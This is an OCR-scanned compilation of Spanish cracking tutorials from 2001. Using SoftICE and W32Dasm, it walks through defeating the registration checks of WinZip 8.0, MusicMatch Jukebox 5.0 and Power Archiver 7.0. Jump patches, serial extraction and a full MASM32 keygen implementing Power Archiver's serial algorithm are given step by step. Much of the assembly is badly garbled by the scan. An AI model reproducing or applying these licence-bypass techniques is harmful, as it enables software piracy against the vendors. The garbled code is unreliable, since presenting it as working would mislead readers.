:00407FBA 85CO0 test eax, eax <------ Testea eax 

:00407FBC 7447 je 00408005 <------- Brinca a error si los codigos son diferentes. 

:00407FBE 57 push edi 


Ahora sabemos que lo que debemos evitar es el tercer salto, para lo cual tenemos que invertir el flujo del programa: 


0.- Cambiar el je por jne, en la barra de comandos de Soft-Ice tecleamos a 00407FBC [enter] y después escribimos ¡ne 00408005 
[enter] presionamos Esc para dejar de escribir código, un FS y .... BOOALA .... Ventana de Felicitaciones. 

1.- Lo NOPeamos, como en el paso anterior solo que ahora escribimos nop [enter] nop [enter], e igualmente nos dan las gracias por 
ser tan buenos. 

2.- O podemos anotar R FL Z para cambiar el sentido de la flag cero y.... ya saben lo que pasa. 


Pero volvemos a abrir el Winzip y sorpresa... no esta registrado, ¿Qué ha pasado?. 

Lo que paso es que los programadores agregaron una protección al inicio del programa para verificar si esta o no registrado con el 
código correspondiente a nuestro nombre que han guardado en el Registro de Windows. (No he averiguado si la proteccion del 
inicio es la misma que esta, si asi fuera podriamos hacer los cambios con un editor hexadecimal y siempre estariamos registrados 
con cualquier s/n.). 


EN BUSCA DEL SERIAL CORRECTO 

Bueno, volvamos a llenar el cuadro de registro con nuestros datos y pongamos el BPPX HMEMCPY para que el Soft-Ice salte 
cuando le demos OK. Presionemos unos cuantos F12 y otros cuantos F10 para llegar hasta la zona del Call maligno (Call 
004079D5), justo encima toquemos F8 para entrar en él, seamos observadores porque nos encontraremos con dos códigos validos. 


:004079D53 55 push ebp <------- Aparecemos aquí. 
:004079D6 8BEC mov ebp, esp 

:004079D8 81EC08020000 sub esp, 00000208 
:004079DE 53 push ebx 

:004079DF 56 push esi 


F10, F10, F10, F1O, F10, FLO, FlO...... hata llegar a esta zona. 


:00407A8A 33C0 xor eax, eax 

:00407A8C E9B 1000000 ¡mp 00407B42 

:00407A91 8D85COFEFFFF lea eax, dword ptr [ebp-0140] 

:00407A97 50 push eax 

:00407A98 57 push edi 

:00407A99 E8SA9000000 call 00407B47 <------- Genera nuestro ler. codigo y lo pone en [ebp-0140]. 


Con un D ebp-0140 Soft-Ice nos muestra un hermoso numero de 8 cifras: XXXXXXXX. 


:00407A9E BEA4CD4800 mov esi, 0048CDA4<------- Mueve nuestro 787878 a esi. 

:00407AA3 8D85COFEFFFF lea eax, dword ptr [ebp-0140] <------- Mueve el ler. codigo a eax. 

:00407AA9 56 push esi <------- Empuja 787878 la pila. 

:00407AAA 50 push eax <------- Empuja el ler. codigo a la pila. 

:00407AAB E820180600 call 004692D0 <------- Creo que hace comparaciones del ler. codigo y nuestro 787878 
:00407ABO 83C410 add esp, 00000010 

:00407AB3 F7D8 neg eax 

:00407AB5 1BCO0 sbb eax, eax 

:00407AB7 40 inc eax 


:00407AB8 A3DC9F4800 mov dword ptr [00489FDC], eax 

:00407ABD 7368 ¡ne 00407B27 

:00407ABF 8D85COFEFFFF lea eax, dword ptr [ebp-0140] 

:00407ACS5 50 push eax 

:00407AC6 57 push edi 

:00407AC7 E818010000 call 00407BE4 <------- Genera nuestro 2do. codigo y lo pone en [ebp-0140]. 


Con otro D ebp-0140 Soft-Ice nos muestra otro numero parecido al anteior: XXXXXXXX. 


:00407ACC 8D85COFEFFFF lea eax, dword ptr [ebp-0140] <------- Mueve el 2do. codigo a eax. 
:00407AD2 56 push esi <------- Empuja el 787878 a la pila. 
:00407AD3 50 push eax <------- Empuja el 2do. codigo a la pila. 


Presionamos FS para salir del Soft-Ice y volvemos a llenar la ventana de registro con nuestro nombre y cualquiera de los dos 
códigos que nos han proporcionado, y.... aparece la ventana de felicitaciones, le damos OK, cerramos el Winzip, lo volvemos a 
abrir y ya no nos aparece la molesta nag del inicio ni ningún mensaje molesto. LO HEMOS LOGRADO. 

Con esto ha sido mas que suficiente para poder conseguir un código correcto (dos en realidad), creo que el primer código es para 
alguna versión antigua del Winzip y el segundo es exclusivamente para la versión 8.0 o viceversa o que se yo :-). 


EJERCICIO EXTRA 
¿Qué? ¿Esto ha sido todo? ¿Ya se ha cansado Winzip?... ok., si Winzip ya no quiere jugar con nosotros, juguemos nosotros con 
Winzip. 


¿Pero que a que podremos jugar?... pensemos... ¡No, eso no!... ¡No, tampoco eso!... ¡Ya!... ¿Porque no hacer un KeyGenerator?, oh 
si, eso si que es interesante pero, ¿Como le vamos a hacer? 

Bueno, sabemos que cuando genera alguno de nuestros serials los pone en alguna dirección de memoria, y que si no le damos el 
serial correcto nos muestra una ventana con un mensaje que por supuesto también salió de la memoria, ahora ¿Que pasaría si en 
lugar de ir a la posición de memoria donde se encuentra el mensaje de error fuera a donde esta uno de nuestros serials correcto? oh 
si, ya veo la cara de felicidad en sus rostros. 


Ok, empecemos esto que se me esta haciendo agua la boca... He escogido al segundo serial como el afortunado (ya verán porque) 
para aparecer en nuestra ventanita. Entonces tenemos que cuando se genera este numero el Call 00407BE4 lo pone en la dirección 
[ebp-0140] y que el mensaje de error aparece en un lugar así: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(O), :00407FB3(C), :00407FBC(C) 


| 
:00408005 E89C020000 call 004082A6 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect information" 
| 

:0040800A 688E020000 push 0000028E 

:0040800F E8D9750300 call 0043F5ED 

:00408014 50 push eax <------- Algo se pushea aqui. 

:00408015 53 push ebx <------- Algo se pushea aqui. 

:00408016 6A3D push 0000003D <------- Y aquí tambien. 

:00408018 ES08800200 call 00430025 <------- Este call es el responsable del mensaje de error. 
:0040801D 83C410 add esp, 00000010 

:00408020 FFO05F87A4800 inc dword ptr [00487AF8] 

:00408026 833DF87A480003 cmp dword ptr [00487AF8], 00000003 

:0040802D 0F85F9000000 jne 0040812C 

:00408033 6A00 push 00000000 


Si miramos a que es lo que apunta el registro EAX en :00408014, vemos que esta el texto: Incomplete or incorrect information. Y 
es ahí donde debemos pushear nuestro serial y para ello debemos entrar en el Call 004079D5 antes mencionado y mantener 
presionado EFlO0 hasta llegar a aquí: 


:00407B27 682C010000 push 0000012C 
:00407B2C 8D85COFEFFFF lea eax, [ebp-0140] <------- Mueve lo que apunta [ebp-0140] a eax. 
:00407B32 6A00 push 00000000 


:00407B34 50 push eax 

:00407B35 E8D6000600 call 00467C10 <------- Este call borra de la memoria el serial. 

:00407B3A A1DC9F4800 mov eax, [00489FDC] <------- Mueve a eax un 00000000 que hace que brinquemos a error al salir del 
Call. 

:00407B3F 83C40C add esp, 0000000C 

:00407B42 5F pop edi 

:00407B43 5E pop esi 

:00407B44 5B pop ebx 

:00407B45 C9 leave 

:00407B46 C3 ret 


En esta zona vemos que un maldito Call borra de nuestra memoria el serial y que antes del el hay unos push y un lea eax..., aunque 
evitáramos el Call y también que eax valga cero, saldríamos del Call con un valor diferente de cero y no llegaríamos a la zona de 
error, lo cual no queremos. Entonces debemos utilizar otro registro que sea el que apunte a el serial para después pushearlo antes 
del mensaje, y si miramos los registros mientras presionamos F10 vemos que el único que no cambia antes de llegar al mensaje es 
ESI. Lo que debemos hacer entonces es mover la dirección de memoria a la cual apunta [ebp-0140] a esi y también evitar el Call 
que pone en ceros la memoria, nótese que debemos empezar a escribir nuestro código donde esta el primer push para que no haya 
desajustes en la pila. Y esto quedaría así: 


:00407B27 682C010000 push 0000012C 

:00407B2C 8D85COFEFFFF lea eax, [ebp-0140] 

:00407B32 8D85COFEFFFF lea esi, [ebp-0140] <------- Movemos la direccion de [ebp-0140] a esi. 
:00407B 34 B800000000 mov eax, 00000000 <------- Ponemos ceros en eax. 


:00407B35 90 nop <------- Llenamos lo espacios sobrantes con un nop. 

:00407B3A 90 nop <------- Llenamos lo espacios sobrantes con un nop. 

:00407B3F 83C40C add esp, 0000000C 

:00407B42 5F pop edi 

:00407B43 5F pop edi <------- Ponemos esto porque si lo dejamos como esta cambiaria el valor de esi. 
:00407B44 5B pop ebx 

:00407B45 C9 leave 

:00407B46 C3 ret 


y por ultimo: 


:0040800A 688E020000 push 0000028E 

:0040800F EsD9750300 call 0043F5ED 

:00408014 55 push esi <------- Pusheamos esi en lugar de eax. 
:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 ES08800200 call 00430025 

:0040801D 83C410 add esp, 00000010 


Cambiando todo esto podemos estar seguros de que el programa nos Pusheara todos los códigos que queramos durante esa sesión 
con el Winzip (hago la suposición de que sabes como cambiar esto con el SICE), pero aquí hay un "pero": no se nos ocurra hacer 
los cambios con un editor hexa porque no garantizo que funcione, si lo haces acuérdate de crear un Backup del programa y 
notificarme si te funciono... Ok. 


Quiero agradecer a todos los Crackers que han publicado sus textos, de los cuales me he apoyado para poder realizar este Crack, y 
por supuesto a la industria del Shareware que nos proporciona una gran variedad de la materia prima con la podemos pasar muy 
gratos momentos. 


Y por ultimo un saludo para todos compas de Monterrey :-). 


Sugerencias, comentarios, correcciones y demás a: ckener452(0 hotmail.com 


"Este tutorial es exclusivamente para uso educacional, el autor no se hace responsable por el mal uso que se le pueda dar." 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: | MusicMatch Jukebox 5.0 


PROTECCION: Serial, Opciones deshabilitadas. 

Descripcion: ¡Reproductor y Convertidor de Mp3. 

Dificultad: | Novato. 

DOWNLOAD: http: //www.nolosé.com 

Herramientas: [Soft Ice, W32Dasm 

CRACKER: | CKENER | FECHA: 28/04/2001 


INTRODUCCION 


Hola a todos, aquí estoy de nuevo con mi segundo tuto y se trata de MusicMatch Jukebox que creo que ya 
todos lo conocen y alguna vez lo han usado,el programa creo que no merece este escrito porque de todos los 
programas que he crackeado este es el más sencillo, pero quiero hablar sobre un detalle con el que nunca me 
había topado (la protección se encuentra en una dll.), espero que no se burlen de mi por haber escrito esto... 
Ok. 


AL ATAKE 


Antes de empezar a crackear familiaricémonos un poco con el programa, busquemos una canción de nuestro agrado como The Call 
of the Ktulu de Metallica (el mas puro del Heavy Metal) en nuestro flamante Disco Duro y escuchémosla, pasemos el mouse sobre 
los botones y observemos que cambian de color a un verde mallativo, todo parece ir bien en estos momentos pero si queremos pasar 
una canción de un CD a mp3 nos encontramos con que aparecen deshabilitadas las opciones de 128 y 160 kbps y la mejorcita que 
vemos es de 96 kbps, esto es lo que me caga de sobremanera, ya una vez molestos démosle una solución. 


Vemos un menú Register... Enter Key desde donde podemos atacar, también que solo nos pide la Key, introduzcamos cualquier 
cosa, después demos un click a OK y lo que estábamos esperando... una ventanita que dice ya saben que "The Upgrade Key is Not 
Valid. Please Try... bla, bla, bla". 


Ahora vallamos a desensamblarlo con W32Dasm a ver que nos encontramos, interroguemos a las String References para ver que es 
lo que callan, pero después de tanto buscar no encontramos la cadena del mensaje de error, ¿Qué podrá ser? ¿De donde ha salido ese 
mensaje?... utilicemos el ZenCracking... pensemos... ¿Qué acaso no dice MMSecurity en el titulo del mensaje? ¿Qué será eso?... 
Sabemos que el nombre del ejecutable es mmjb.exe ¿Acaso todos los archivos del MusicMatch tendrán el prefijo mm?... Sí, vemos 
en la carpeta del programa unos archivos como mm_tray.exe, mmtrace.exe, mmpurchase.exe, el mismo mmyjb.exe, etc, etc, Si vemos 
los archivos que están ocultos encontraremos varias dlls que empiezan con el prefijo mm y entre ellas MMSecurity, ¡ Esa debe ser la 
culpable ! (Cabe suponer que también podríamos haber llegado a la conclusión de que es MMSecurity.dll la que genera el mensaje 
de error simplemente traceando con SICE antes de que aparezca dicho mensaje observando la línea verde de abajo de la pantalla). 


Desensamblamos la DLL, vamos a las SR y tampoco encontramos la dichosa cadena, pero ahora veamos las exportaciones que 
proporciona esta DLL y vemos unas funciones que parecen clave: GetLatestKey, GetUpgradeKey, ManualUpgradeKey y 
SetUpgradeKey, sus nombres lo dicen todo. 


¿Pero que hace cada una? 

GetUpgradeKey: es la encargada de abrir la conexión a Internet y el explorador para registrarnos en línea, también nos pone una 
ventana donde nos muestra nuestro serial una vez ya registrados. 

ManualUpgradeKey: es la encargada de abrir el dialogo para introducir la Key que obtuvimos después de que nos hallan robado una 
buena cantidad de dinero de nuestra MasterCard ;-) 

SetUpgradeKey: es la hace las comparaciones y nos da el mensaje de error si no hemos acertado. 

GetLatestUpgradeKey: aun no lo averiguo. 


Ahora que ya sabemos como funciona el meollo dediquémonos a simplemente cambiarle las cosas al programa. Para ello pongamos 
un BPX GETWINDOWTEXTA después de llenar el cuadro de dialogo con cualquier cosa (CKENER) y hacemos click en OK, una 
vez salte SICE borremos el BreakPoint anterior y pongamos otro así BPX 67A020BO, que es la dirección donde empieza la función 
SetUpgradeKey y presionemos FS3 para llegar e esta zona: 


:67A020BO 55 push ebp >Aparecemos aquí. 
:67A020B1 8BEC mov ebp, esp 

:67A020B3 81ECACO000000 sub esp, O0ODOO0DAC 
:67A020B9 53 push ebx 

:67A020BA 56 push esi 

:67A020BB 57 push edi 

:67A020BC E8CC350000 call 67A0568D 
:67A020C1 50 push eax 


F10, F10, FLO, ElO... hasta llegar aquí: 


:67A020E5 E831FDFFFF call 67A01E1B 

:67A020EA BE108AA067 mov esi, 67A08A10 

:67A020EF 53 push ebx 

:67A020F0 8BCE mov ecx, esi 

:67A020F2 E80C250000 call 67A04603 >Compara nuestro serial con el verdadero y si son diferentes EAX=0 lo cual nos hace 
brincar a error. 

:67A020F7 83F801 cmp eax, 00000001 >Compara EAX con 1. 

:67 A020FA 0F85D3000000 jne 67A021D3 >Salta a error si son diferentes. 
:67A02100 57 push edi 

:67A02101 53 push ebx 

:67A02102 50 push eax 


* Possible StringData Ref from Data Obj ->"Upgrade Key" 


:67A02103 68B882A067 push 67A082B8 


* Possible StringData Ref from Data Obj ->"MMGenlInfo" 


:67A02108 68AC82A067 push 67A082AC 
:67A0210D FFS5CC call [ebp-34] 
:67A02110 83C414 add esp, 00000014 
:67A02113 85CO0 test eax, eax 

:67A02115 7411 je 67402128 


Vemos que si se produce el salto jne 67A021D3 nos mandan directo a chupar camote, con lo cual evitarían que lleguemos a la zona 
donde se escribe nuestro serial en el registro de Windows en: HKEY_LOCAL_ MACHINE SoftwarAMusicMatcAMusicMatch 
Jukebox 4.AMMGenInfAUpgrade Key, si cambiamos el susodicho salto anotando justo encima de el R FL Z (cambiar flag cero) 
podremos estar seguros que el programa no hara mas comprobaciones y estara totalmente crackeado pudiendo asi copiar Cds a Mp3 
a 160 kbps en nuestro ordenata, aunque con muy mala calidad por cierto. 


En realidad este crack es muy sencillo y el tuto muy corto por lo que no merecía ser escrito, pero quería demostrar que las 
protecciones aunque sean tan estúpidas como esta no necesariamente tienen que estar en el mismo ejecutable, Ok?. 


Antes de terminar pensemos un poco en algo que podríamos encontrarnos por ahí, si quisiéramos crackear un programa con alguna 
protección como esta, pero en lugar de que sea la función en la DLL la que muestre el mensaje de error, la función regresara un 
valor al ejecutable y fuera el mismo quien mostrara el mensaje dependiendo de el valor que se haya retornado ¿Qué pasaría entonces 


si buscamos dentro del ejecutable, eh?, pues no encontraríamos por ningún lado el lugar donde se hacen las comparaciones o donde 
se genera el serial correcto dentro del programa desensamblado, se podría encontrar simplemente tracenado después de un BPX 
GetWindowTexta por ejemplo, pero hay estar concientes de que el León no es como lo pintan. Bueno esto ha sido todo y como dice 
la zorra: a chingar a otro lado y que Dios te socorra. 

Hasta el próximo (sí es que llega). 


Sugerencias, comentarios, correcciones y demás a: ckener452 O hotmail.com 


"Este tutorial es exclusivamente para uso educacional, el autor no se hace responsable por el mal uso que se le pueda dar." 
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PROTECCION: 
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Dificultad: 
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Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Power Archiver 7.0 


Name / Serial. 

Hacer un Keygen. 

Compresor/Descompresor con un montón de formatos. 
Aficionado. 


http: //download.powerarchiver.com/powarc70.exe 


Softice, MAsm32. 


CaoS ReptantE FECHA: 03/07/2001 


INTRODUCCION 


Este programa había sido gratuito hasta esta versión, y la verdad es que podía haber seguido así. Y es que 
para la protección que le han puesto, mejor no haberse molestado. Me gustaría que el infausto programador 
leyera este tuto, ya que le sería de utilidad, aunque dudo que lo lea, ni este ni cualquier otro :0( La verdad 
es que últimamente me debato entre la rabia que me da que sean tan descuidados y la pena que me da su 
ingenuidad. Pero bueno, allá ellos... Como veréis, me he decidido a continuar con el tema de los keygens. 
He encontrado otra razón para preferir el keygen o al menos el serial al parche, y es que me ha pasado que 
un programa dado por crackeado, al cabo del tiempo, y por razones que desconozco (yo no lo utilizo, lo 
está "evaluando" un amigo), ha salido de su letargo y se ha acordado de que no está registrado. Esto con un 
número de registro "legal", no habría ocurrido. 


AL ATAKE 


Encontrar el serial number es muy sencillo. Basta con ejecutar el programa con el Softlce cargado, introducir los 
datos que nos pida el cuerpo para registrarnos, y antes de pulsar "OK", introducir en el SIce: bpx hmemcpy. Le 
damos a "OK", salta el Slce, le damos a FS para que lea la segunda ventana de texto, siete veces a F12 y estamos en 
el programa. Si queremos saber el serial, buscaremos en la memoria el serial que hemos introducido mediante la 
instrucción s 30:00 1 f£ffffff 'serial_chungo' y a continuación le pediremos al Slce que nos avise cuando se lea este 
número mediante bpm dirección_obtenida r y llegaremos a esta zona: 


:00404039 8BOE mov ecx, dword ptr [esi] 
:0040403B 8B1F mov ebx, dword ptr [edi] 
:0040403D 39D9 cmp ecx, ebx 
:0040403F 7558 jne 00404099 


Aquí podremos ver en la dirección indicada por ESI y EDI el serial chungo y el serial bueno respectivamente. Tened 
en cuenta que el número lo escribe en un par de sitios y es posible que no acertemos a la primera. Por cierto, os 
recuerdo que introduciendo la instrucción s (sin parámetros) continua la búsqueda, hasta encontrar la siguiente 
coincidencia. 


Ahora, aunque agotados por el esfuerzo ;0o) vamos a ver el proceso de generación del número correcto. Este se 
obtiene a partir del nombre, por lo que seguiremos un proceso parecido al anterior, pero en el que buscaremos el 
momento en que el programa lee nuestro nombre en vez del número. Aquí la cosa se complica porque el programa 
copia el nombre en otro lugar: 


:0040296F F3 repz 
:00402970 A5 movsd 


Esta instrucción copia una cadena de texto de la dirección indicada por DS:ESI a la indicada por CS:EDI. Sólo a 
título orientativo, daré las direcciones: 016F:018891E0 y 0167: 00E0F2DD como origen y destino, aunque pueden 
cambiar en cada ejecución. Para detectar la lectura del nombre en la nueva dirección, ponemos la instrucción bpm 
nueva_dirección r y ahora sí que nos lleva al punto culminante. Se trata de un bucle que se repite tantas veces como 
letras tenga nuestro nombre: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0058B88A (C) 
:0058B82A 33C0 xor eax, eax 
:0058B82C 8A03 mov al, byte ptr [ebx] 


Llegamos aquí, en el momento en que el programa lee la primera letra del nombre: "C". Por tanto AL=43h. 


:0058B82E 03C6 add eax, esi 


En el primer paso por el bucle, ESI=1403h, en los siguientes pasos, tomará el valor correspondiente. El resultado de 
la suma es 43h + 1403h = 1446h. 


:0058B830 B9FFO000000 mov ecx, 000000FF 
:0058B835 99 cda 
:0058B836 F7F9 idiv ecx 


La instrucción CDQ es necesaria para la división siguiente , ya que convierte doble word en cuádruple, es decir, 
EAX -> EDX : EAX. La división se efectúa entre EDX : EAX y ECX, el resto que es lo que nos interesa, se coloca 
en EDX. 


:0058B838 8BF2 mov esi, edx 


Hemos dividido 1446h entre FFh, el resultado es 14h y el resto SAh, que colocamos en ESI. 


:0058B83A 3B7DF4 cmp edi, dword ptr [ebp-0C] 
:0058B83D 7D03 jge 0058B842 
:0058B83F 47 inc edi 


:0058B840 EBO5 jmp 0058B847 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0058B83D (C) 


:0058B842 BF01000000 mov edi, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :0058B840 (U) 

:0058B847 33C0 xor eax, eax 

:0058B849 8A843DECFEFFFE mov al, byte ptr [ebp+edi-00000114] 


Aquí se coloca el código ASCII de la primera letra de la cadena de texto "IP-POWERARC" (49h). Hay que señalar 
que si el nombre es más largo que esta cadena, se vuelve a empezar por la primera letra. 


:0058B850 33F0 xor esi, eax 


Se efectúa un XOR entre SAh y 49h que da como resultado 13h. Este será el valor de ESI al segundo paso por el 
bucle. 


:0058B852 8D85E0FDFFFF lea eax, dword ptr [ebp+FEFFFDEO] 
:0058B858 50 push eax 

:0058B859 89B5E4FDFFFF mov dword ptr [ebp+FFFFFDE4], esi 
:0058B85F C685E8FDFFFFOO mov byte ptr [ebp+FFFFFDE8], 00 
:0058B866 8D95E4FDEFFFF lea edx, dword ptr [ebp+FEFFFDE4] 
:0058B86C 33C9 XOYr ecx, ecx 

* Possible StringData Ref from Code Ob3 ->"31.2x" 


:0058B86E B858B95800 mov eax, 0058B958 

:0058B873 E87CDDE7FE call 004095F4 

:0058B878 8B95E0OFDEFFFF mov edx, dword ptr [ebp+FFFFFDEO] 
:0058B87E 8D45F0 lea eax, dword ptr [ebp-10] 
:0058B881 E88286E7FE call 00403F08 


En este call se irán colocando los resultados obtenidos de las operaciones descritas anteriormente formando una serie 
encabezada por 14 03. Al terminar la primera ejecución del bucle, la serie será: 14 03 13. 


:0058B886 43 inc ebx 
:0058B887 FF4DEC dec [ebp-14] 
:0058B88A 759E jne 0058B82A 


Al salir del bucle, el valor de la serie correspondiente al nombre "CaoS ReptantE" es: 14 03 13 24 BE 42 2D 2B C8 
6B 9E 52 83 BE 54. Continuamos: 


::0058B88C 8B45F0 mov eax, dword ptr [ebp-10] 


Pone en EAX la longitud de la serie (1E). 


:0058B88F E86C86E7FE call 00403F00 
:0058B894 8BFO mov esi, eax 
Ahora en ESI. 

:0058B896 85F6 test esi, esi 
:0058B898 7903 jns 0058B89D 
:0058B89A 83C603 add esi, 00000003 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0058B898 (C) 


:0058B89D C1FE02 sar esi, 02 


Esta instrucción equivale a dividir ESI por 4. En nuestro caso 1E : 4=7 (el resto, que es 2, no cuenta). 


Lo que viene a continuación es un cierto galimatías que no me siento con fuerzas para detallar :0) Resumiendo, en 
nuestro caso, lo que hace es tomar la 7* cifra (2) y ponerla en otro lado. A continuación, pone la anterior (3), y va 
haciendo lo mismo con los otros múltiplos de 7 hasta completar las ocho cifras de la clave (14*, 13*, 21*, 20*, etc.). 
Así la clave correspondiente al nombre que hemos introducido es: 23D29BEB. Tengamos en cuenta que la longitud 
mínima del nombre para poder conseguir una clave de ocho cifras es de dos caracteres (dos caracteres nos dan cuatro 
cifras, que junto con 1403 nos dan las ocho) y que aunque el programa no controla (que yo sepa) la longitud del 
nombre, no aceptará ningún serial correspondiente a un nombre de una letra. Lo digo más que nada por si alguien 
quiere hacer la prueba. 


Ahora vamos a programar un generador de números de registro. 


En este manual, sólo voy a comentar lo estrictamente relacionado con este programa, ya que la estructura del keygen 
es similar a la de otros que ya conocemos por haberlos visto anteriormente. Si algo no queda claro, porque no habéis 
leído mis trabajos anteriores, o porque no está bien explicado, me podéis dar un toque. 


Como siempre, echaremos mano del Msam32. Empezaremos por el fichero de recursos rsrc.rc: 


include "Amasm32Xincludelresource.h" 
define IDD_DIALOG 1000 
define IDC_NAME 1001 
define IDC_SERIAL 1002 
define IDC_GEN 1003 
define IDC_EXI 1004 
define IDC_STATIC 1 

keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,104,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "Power Archiver 7.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
¿TEX "Nombre", IDC_STATIC,8,6,28,12 
TEX "Serial",IDC_STATIC,8,26,28,12 
EDITTEX IDC_NAME, 36,6,59,12,ES_AUTOHSCROLL | ES_CENTER 
EDITTEXT IDC_SERIAL,36,26,59,12,ES_READONLY | ES_CENTER 
PUSHBUTTON "Generar", IDC_GEN, 8, 45,40,14 
PUSHBUTTON "Terminar", IDC_EXIT,57,45,40,14 


END 


Y ahora el fichero de código powerarc.asm: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_EXIT EQU 1004 


DlgFunc PROTO :DWORD, : DWORD, :DWORD, : DWORD 


Operacion PROTO 


. data 

nombre db 64 dup(0),0 
cadena db 130 dup(0),0 
serial db 8 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 
Iconimage db "keygen",0 

texto db "IP-POWERARC",0 
minombre db "CaoS ReptantE",0 
menosde2 db "¡Mínimo 2 caracteres!",0 
hInstance dd O 

hIcon dd 0 

hWnd dd 0 

. code 

start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 

mov eax,hDlg 

mov hWnd, eax 

invoke LoadIcon,hInstance,addr Icono 

mov hlIcon,eax 

invoke SendMessage, hDlg, WM_SETICON,1,hIcon 

invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 

invoke EndDialog,hDl1g,NULL 
.elseif uMsg==WM_COMMAND 

mov eax,wParam 


mov edx,eax 


shr edx,16 

.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 80 


invoke l1lstrlen,ADDR nombre 


invoke Operacion 


.1f eax== 

invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR menosde2 
.else 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg,IDC_NAME, ADDR nombre 


.endif 
ret 
.endif 
.endif 
.endif 
ret 


DlgFunc endp 


Esta parte es similar a lo que hemos visto en trabajos anteriores. Ahora entramos en terreno desconocido :0) 
Operacion proc 


.1f eax < 2 
mov eax,1l 
ret 

.endif 
pushad 


Comprobamos la longitud del nombre y si es menor que dos, volvemos y damos el mensaje de error. En caso 
contrario, guardamos los registros (no creo que sea necesario, pero por si acaso...) y continuamos: 


mov esi,1403h 

xor edx, edx 
mov ebx, offset nombre 

mov edi, offset texto 

mov ebp, offset cadena 

for codigo, <49,52,48,51> 
mov byte ptr [ebp], codigo 
inc ebp 

endm 


Colocamos en la dirección de cadena los códigos ASCII de: 1, 4, O y 3. Tened en cuenta que en Masm32, los 
números se suponen en base decimal, a no ser que se indique lo contrario (con "h" al final) como he hecho más arriba 
con el 1403h. También hay que saber que si se pone un número hexadecimal que empiece por una letra, hay que 
poner un cero delante para que el programa sepa que se trata de un número. He puesto números hexadecimales para 
facilitar la comparación con el programa original, y decimales cuando me ha parecido que resultaba más claro. 


buclel: xor eax, eax 
mov al, byte ptr [ebx]l 
«if al == 0 
jmp seguir 
.endif 


Tomamos cada uno de los caracteres del nombre y comprobamos que no sea cero. Si es igual a cero, significa que 
hemos terminado con el nombre y saltamos. 


ebx 
eax, 
ecx, 


inc 
add 
mov 
cda 
idiv ecx 
mov esi, 


esi 
O0FEFh 


edx 


Como veis, esto hace lo mismo que el programa original. 


al, 
al== 
edi, 


mov 
Pa Es 
sub 
jmp 
.endif 


volver: 


Si hemos llegado al fin 


inc edi 
xor esi, 
xor edx, 
mov eax, 


byte ptr 


[edi] 


dl 


volver 


al del campo texto (IP-POWERARC), volvemos al principio. 


eax 
edx 
esi 


Ahora ya tenemos un número, por ejemplo SAh, pero para poder tratar cada dígito por separado y poder imprimirlo 


luego en pantalla, nece 


mov ecx, 


sitamos convertirlo en el código ASCII de las cifras que lo forman. 


16 


mas1l: 


div 
¿E 


ecx 
eax < 10 

add eax, 48 

jmp mas1l 

.endif 

.1f eax > 9 

add eax,55 

.endif 

mov byte ptr [ebp], 
inc ebp 


al 


Si dividimos SAh por 16, lógicamente nos dará un cociente de 5 (en EAX) y un resto de A (en EDX). A continuación 
miramos si el cociente está representado por un número del 0 al 9 y si es así, le sumamos 48 (en nuestro caso 48 + 5 
= 53, código ASCII de "5"). Si es una letra de la A a la F, entonces le sumamos 55. Colocamos el resultado en la 


dirección de la variable cadena. 


mas2: 


.1f edx < 10 

add edx, 48 

jmp mas2 

.endif 

.1f edx > 9 

add edx,55 

.endif 

mov byte ptr [ebp], 
inc ebp 

jmp buclel 


dl 


Hemos hecho lo mismo con el resto que con el cociente (en este caso, a Ah = 10 le hemos sumado 55 y hemos 
obtenido 65 que es el código ASCH de "A”). Colocamos el resultado a continuación del anterior y vamos a por otro. 


Una vez terminado el nombre, continuamos: 


seguir: 


offset serial 
mov esi, offset cadena 
sbb ebp, esi 

sar ebp, 2 

dec esi 
xor eax, 


mov ebx, 


eax 


Esto es más o menos, lo mismo que el programa original. Decrementamos ESTI porque si no, al contar cifras (en 
nuestro caso, siete) lo haría a partir de la segunda cifra, ya que ESI apunta a la primera. 


bucle2: add esi, ebp 
mov dl, byte ptr [esil 
mov byte ptr [ebx], dl 
inc ebx 
inc eax 
mov dl, byte ptr [esi-1] 
mov byte ptr [ebx], dl 
inc ebx 
inc eax 
.1f eax < 8 
jmp bucle2 
.endif 


Este bucle se efectúa ocho veces para obtener las ocho cifras del serial que se colocan en la variable serial. Ahora 
recuperamos los registros y volvemos. 


popad 
ret 
Operacion endp 


end start 
Y con esto terminamos el keygen. 
Os recuerdo que si os interesa este tema, es imprescindible leer: "Como Craquear con Ensamblador para Win32" de 


